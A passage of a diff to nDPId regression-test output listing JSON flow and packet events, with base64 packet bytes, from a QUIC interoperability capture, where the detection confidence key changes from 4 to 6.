BcFcvM
4iPJEdLrpJXtiL7lozz\/DNjHrb6qIdiWBMUyCod\/1w5XY81jvBVw6EPdS52X\/61VYwnM6etnlrj2efLI9zOedaqcKmUUuU5hMhqfCCW6Ds62KH8dV8j+mD8L1skbcaPGiQBq8L77krzCDv+w=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1603816434587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434587,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA73RAAEARuC\/AqAGAwb4KYucjEVEE7DgFzwoKCgoIOPxKwZ+D2JAAAETS91nHeEtqNVprqBpjlBuMS4qDhd3kUN8qDrM+F\/ekloYAYgcZUMLt8kdbAj4yNgXM150XEsSqUaY2u+NNo8mFZEwXy2OnYTv\/L1pA2ooV9c\/qfb6IQtVvpkYCa79kPBP0tyFMp4w86ypVGLJRFE2wcR8W+ufL4zQbFmHQUN4s8EKBgftF0IZ9d+hGzrCohfVKAmj2TbAATwLc5qROqnCXSPAAIwsgXC6FvxeRe5C81GzRnEFcVKohNWvuH+YgU\/EQzJ8x0h2o1KXN+x2kz8nNm4RV\/bBgatrr3rE9I9H9H7X4vNkwSkPN1LE\/7YLaXxFkeX+BvfHM9pLsCwVYI43jNMZK\/82M5vqAJwLAoGNaMNRy1bvSqZ2Qnqs8doUi12HdtkWRB7hy4DLBCO6i\/WKQJjLKdpFeD7phx\/6P3mBKcjDeMOT9LGfsfpWDEggtVg0K+PNic2DC+MGaabHUIfDeFXxZwVJQjnBWnr7uiJ1+uGYObevmoi83q\/oHGzH2zJ45l2SHUS8N5EDtYU7jRJ0C0k352go\/BLzWhvpxttBJ0HkbJN+Lf8iGQ7\/HNrO0sSvxhBlXfXloOUmwXwy4ZOiFy754b5M3BhRivvL68fxBqtVY1N2wA1osEboLNfPnmjiBhXxUugq2mfHLbsnTaxih+guwrlRqVVQng52RQJYpjyC\/IQpqxIgm\/p+tg8gZMclfhCysFzs0Sx7c51U8U\/eV6RVzg4J9aZi1F6t1E9qqrDD9rTgXDBFK+53U4dmwwrA3ilycimT\/hbzORA3BufMgHAOtz3cpn\/t7KLfrocmCHydxweYPjYv8od0eN7GuRZC\/Dkkx5pLEApXJKbDycSs4W77Wi8NgAqHOpGnI10QBHXyfFP+YPX\/MbUtvkqyBKvQeesidG
lYsUe0gYlnKX1yYRVG\/iKS0PMJZC3FHvFiL6obiVGRuwwpTV3d7lkotBNp2jqZCw1NLWglC1fuu1coZsHS72tmzKvcBFgtdmqwenN1JrK8F5rdOVfBQ8yE66XD3W8yAjlz\/Qvq\/DIB7QOU2zYdRo\/xweEsuV1v5VGk+8J0AJw0wbBWw2a7KJD1o3bx\/fl3Fi0jbHAOf1Fon8qpBSfuKwo0q4+YMAnbX13uRf4o0syD1YOszGCYMMZmBO0q\/PYK7xkQl3CoFVjP6bHq4sVQrk6j7MBPS838Z1ManSJBz3k+oiO\/sknlDJhNUIHfSq8TgRjn5JEi1pn2KhrqsPoB73ZpXqkfBB7bu8rzkBoJrWwjjZeFkHJOfD8ToexbXz43k\/IjggUNPy2WSLw1q33LeO+gOH5GXB9\/QgYQ697NrQKVyKlRVZXeNUwnQS4zycuS8PuKHeqfdW9Z+9PEo4DpPFRu+B7BfvVgxbF3wCCeyZwvtKZFkAMhl54zHOUC4V5hgvug19KxTuTtQDyeR7SJbTf3aDyi+uN2eX72\/wUD5r\/K2ChPZ9Gse97JUpH8JYVHPwSDEUEO85gNWGwO2wDrwXcE1X7p+U2f6nsA1R+bUBz04uvKlIU4Sa3pHvuKQRjh6XPQ2ThEX3UW558Xx7NikbDf\/f1LNSL9NCOFEeMnTLHFDcVVOXK5I01l4ewmR2fHvlVQvWH\/bOr5xDcwdY+kNlEO6n\/7tlWOai8jsYPqutA=="} -01006{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+01006{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1603816434590,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434590,"pkt":"pJGxgjQ5PKn0qB\/sht1gCk\/uBNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABizsRUQTY3hvBCgoKCgg1RfSbShWYtQAARL7tTf7Q3DPhiEmC4nM7FyCePUSXuhX\/xJUKDzdA3Dndh7i7AZ7IYGRP1Yj0EuU9mm9YXASeUAKarL7NfQFkziaDEWFlefwq8ZzHKOgKpSqZeoocfYxvZJ8CSRvYoWz\/L6jmv6jaQeOLENERntb1qDtsRo5+v992QGLT9TUEMVkwT2FvUb5KMSqTvrwWgkM2hgSTV4EyBe1D3gc0yLlWmSFz3jz3ijFR560nQwOMUo4q8F8wUAgTdOAVJvBGKThzf\/CoAwD57myBv4uKJMnypuTatEvPlB46uv\/yty2eheod7+0rebXxYj4Uc+UqPb9wT8PhoyG868QW5UmJx34aYK7eN3JuR15+ImKbVmoE6EL83PSKYkHyQopRIotBEKQDm+GsSi14PMbpT\/MRFwhAVJ+sQdlkceub2KUXDJHao+eBA5w8vGU2OKSHGw6MFHU+N+USgIVLGu8C0b2WNKFbDS9r1lqcSYhWRSXCnwTaP8cP1GWArgqHq4NJrJMJXD+xs1H+vApBkOM\/ZeUAGUAtTfkrI5gOusV9oUnq2ItgMvR76a8xKxY\/SiVzw7ucrWK5N2tQ5JkPI\/NGcIpsYWE01h06TOMdCUToNwiJfkP0MPn3vMz2JyLbhE71KWygYVxZlHissMIrLNj2hzs1t4mgi8Dfs0l9RtozbB15+zjCqfBYkvDNCXVfu0MO1trH5LQH40Myn9bZeAAzq9F2i07k2zD6tl2iozB832XjSA\/tFg7fJub\/mksvHDenolmTIZGI4wO5Z3NTh426m1Xr55i+p\/4y\/Q9IBI2x3X4SBvQZun3kWH6dWj67baJqzcocTD7LnXnDRN2eJnB0+m+Xkg+SR2CQD8FNHBCSnN7Yu9TN7g85clS9FrvmkHqNboNkc2KyQf9kCWlFhRrzo5YX6fx357\/JlHGWmF2cH2EDuHHJfgxwA9G7HuV2intBnLuQm+sJuJfIh6mRTKTYdC1aBxO+FJkXatzCzuj936XOJG7cJwInBtGXzIe7oIez0hn4nIWhuMBVQhhszVOH9hqsvsKAdbnYUdNA1USW6D7R\/xmghiopDfGtjIWLxZREthLkrTZvJPOso30GmJwYCSy+9OZoV2Nj47lGe912feEm235ruyUlWsQTuKpfyC8J7r+SbB5tplBhKbatYRidI3hpJ2q8lvOUBcxy5jvAvjqVG768S0brsL7G6C2TqvMZt\/zTMuDkIHPjWiNDebCJ\/p2a5kYJOC4jhcbwjh\/tz0WznkGbQNVpLag1ovorvXAKpAYOP3LJnhQhOOuZLuZrJxyhVrae9z9d1NLFL8OUzD\/ZclBspPNm3p1e1A75CP6tZBmrEoDhbY1SV4p4vv10\/MMVCqO2nZs0ov\/lFT0sC7weM0SiUoUILcoLsraaHxz2srKVBtLbHRHf5VErVRNyjOmGUC3wJs6R34sc\/8zeM+d6HZcDlUk9ii7+g55y3G7oiGyj1ls\/gUdh7
+ZhHGeX9MFF\/5EajWroXTez4lAWvOzswVIh9B6VOueE+IAtyKSx63VOgxYY7yYRidJ+wxQsHNXarhpUCSPeTmkyBv4qdWIHzyXgiUcAahzyxWMUHmvyy0MueTnQQdoRS92QfxncoT12pzPDDw=="} -01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00640{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1603816434595,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434595,"pkt":"pJGxgjQ5PKn0qB\/sht1gBnpkBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRU25URUQTYvvrACgoKCgj9UoceU8iiQAAARL7az3aryiG\/WW4QSFw5q8b+\/qI9una68JfIBN5RDAlSWxI5aN9NrGnm63U\/Z5hZqT855BEAbzFsnSq9T5UoQJSQWJO+OxKLmuziQZO7srez1fkkDupTN1wkkdnmywDXZcMkFQ4tXNVtGsfMIyPoMOjkuNgYuL+TrFwg96COI8IOfhzUGRFJf8K8t+t3YLfMWc5IM3WJ\/phaCjLWvabCUhYVrFgZVTenSIvn8FoTPxqo1m1xa4G3n8d3o2zFUc4XDalUQSYfIsGCZ\/3VGNAlkjuVi1uuzvCOp0qJEHMlsJ6OjaNJzjSj1b5X311lbaXLxEgAACVJ7mOpBMH2eUKlimPQIRjgO8DFiVT1VtetHEHo7XxD9z9DaojFHhQILu9Ndy7QJYx+8OxPwi0k7EQtFKIeO3QhbI3teT8NwQXlJnQv\/J7yzTNnMCu3L9LWIn6C92d5qUB+1utWZXR28cNynLbRjuRNINQIzfTFmS9iOpbZglrT\/GnsqhcaOJm2t9XrSu4yCE5z0c4wHo6GnMAN05DOXBY0yYPljkh7vr4aKEDxXsaCMcwmcWxYnUlFe
p8Gex3JVoSlUGz95+zuvHb46+MC+XDiipznc431Qn7rrxOB6lgYcTG7kLf\/ZmPHxmDGAINfIYtZO7xiSc5JWwhUA4ikdzTJaE0uo\/HCIsdSFQFJJlEXfiQ6f+9Lg4o4oHt\/v4TQTOThiS8hA3g+cEIozsYToLOF02tEqrwi5BbfszIjeKKW+XlfuQgTXnd+fgE5dAu5Oc7BakCjmnGBb3Uz3ugNj5DTo6+ojP6UY2IU771P\/fqTADAKhT3onheWYJvxAkrQZHLnIxcgu5DA\/5Es1ztGUo\/es0BosHYusWos2FbBdJpxb+gu5rvMEmPCkuCIpZpBZLLug0rWMitGXgJfX9MWvPAjBWdKWTbvcBzKFwh5+\/1ocEXw0VaT+NsU2weQMCO1YYpPIlc+42jUQfCx0zKYejhkxNEoAo38Q29iwZcFALT5rf0jYyMQpMUMcNFQQqqzbrcaHvvgWQzH+lUkFSqbhBqtX5WCPuLWxkDb\/9GhQLNx0Q1IujSYwA1SIvLeb9bsrMAWKENc82M+Wwn3RcXpJ4cDa0hrN+3NcY\/5t1ve6RDek\/0oY6QGGW1JE\/CmiO8t+4Q02FuHroDarDyPM4tHJeLOT2NE6bUo4WRjaSNVu5ng0Eq9X3XBmx0Ikdv91XlzFM87UC5R3r52ZTZNTnO+xLkNyA4Cub32cJnhUFmGLoaAmiMCxezGxr9YUy9YTVqutoTlfA5jfzAmMWcvfXhM8IAoJ7O2szD5hCSuJ8MX3ML7TFR9jrMTogwqPbeDECUgOiFmruVR0+GuDJb2riqtAhc7PvwbnCVPAYbBoyaoy31mi2TG71Wi\/w4IaZaos63DgLgXPzRaSbjG1c2zVPlGYLiTfXzEyhvOk3Mv8aR0DqJ\/gqVm0SvfiOZnBGk5gzICSopKt52HHnW1EwSPCiNSbMh18YFppr0G1bbAe15xP1\/\/Pk0jzR\/wXBG5JS37im5z+jqUQpnV5dcnvgYoRjpgGuTxRGXLjRfoOGzSlFstUpRTF+iEOL+rt3XO56SlECJkrsnzQoo2ccoM5Hgg7A=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00649{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1603816434599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434599,"pkt":"pJGxgjQ5PKn0qB\/sht1gBgPLBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPy3ARUgTYU5HKCgoKCgjzn\/uzo5TjaQAARL4oIwXE1bV3X2RQF+ON3RTsnJX4an3jVlQ7KRPGPw\/cd1gZtN4yjes7ivlyOcq2vm957CNTb4Z32AWph+bIp0qE95znKWOclgtBgRpaMvlLDlaUbTJ1Kjqhg7PudTMGHo8kc8ERMms7zx2J4fSxALfbKS3w04Pkl3fNYWkwJZG9jA2z+7UujsQZ2YxzLHhbiMSZctmG+MqTnAcyQxUOVqOLFrLaBhAxisgQ5MezG68hwcDBiS0ypz8ByM9sY1JtZ4VMrD6ux21WiJ\/gTvOv91V5Grp5XnTWdbnNLG7GrfS3jGjTn2Un\/r3WCKJ0WajhNLHmPUR9BFLSVFG5JiyNgIWA0\/HgJTXD99jRhJkBHyvLeL3j9ePlCvGQ9KCY7A+MdgP5+hrP1QLH82VspHtB2VvSSvMREFxd8jKlKrGybrolBflILJX4GGJlg2hWcC+HeiZGufy5yPCOCbIVpSVQOMyBBe\/Ph0aL\/4q+E+2qJVdBHso12q7ZRf3KyV6KD\/C8p1m5HJ5lk4kmjjCsWakG5crp0wLCKMw1zK5GEWknO8UExqKvojXXFzU2Be74eZgjrj394KHSeeH524syPc8swoO75W7hTdsrJB\/rbuBB+sKBiDCauvTcD0r\/ZL2kwgN2l\/QahiKQcXG7cPXaL3PMAV+\/0HhLKSqjypOevG9iWlPhJOE9CkOrIJqW9G8TK1GKGdKLlPqAZLZ9m71TcFKjQ2zo2h9JsVhhsxqsVTUojf9bVe63KowZvJiNw7kbG5Dx9zv3qk76Scw0pW+2ZZHPjdRZTjmKSA5Y+PYOoxxOicDP9ZVOp+8YwJbnh4YepP36tZkoI4e5hYmgEwZOjt6Yo4GxIrGzuNcUfaa96FJIqS3n0i7MAiXzBsvTUSDnlPJz08s7uoWN3Db9JOSBxZX5qHn+WlZCt6oEKkU8FdQI+7reYK7AI5cK+7Fg6zvWA0dR4F7VGaHhGDIqy3gLf7KmEEyWYRoePUORLvgVC8XTilGAf6Bjlqx9PRGxm0Ja\/4HplWikLpRAYamguRrJONKI6nEhSn9lO27tMAcOTn8Tf6RTu95+ny6hbgPd\/mMKokSGNF7UUtZjCk6cbVH3J7cHgGQXOTjQysmlrFxV2bF8LUmKKxWDOYfmVKmHvf7ramU2h+1zK66w6qsQI2OFBYV6F\/QBKPRxAQlchq5r5kgySGLxmw3m6+Sf6hz7sbVIbyNA36ENRVuZXdVSayaI5VXU677nJtG12s5uEZtWJqnu3YVN\/KK+kE1AeI06S1byEfRfdS5qQoFDC+c6GGJFo5dVEZxLnoVZC3EhBh7dWvLthE6jKMd3CbXVgnSRl9JPjiWwsbn7FBHeycKSDuew5OQ1HtZpeRUJUk5nMgSUOUI0YZ50IJIEFtw5YNao7Ddw10e\/\/nmynctyewik6Tvc8zLrSWaSqgViA6i2PaP6Pv2MZCMyK\/X3XqMdRGKXZs\/jr8\/dMBZX3F\
/DYmeMdlamiU1RcDJHP8r+9yBXO9yUXOhN7Pnl31zJ6vG4vR0yXekz\/kuQnX3VMYt3WopVdGtyLE43Smp\/Tz11cx6MymTg0YsqpJ+vSsiBwEm1Kebt\/+JMBAhlGhj5jM9y3tuD9xf5ApCnIw=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 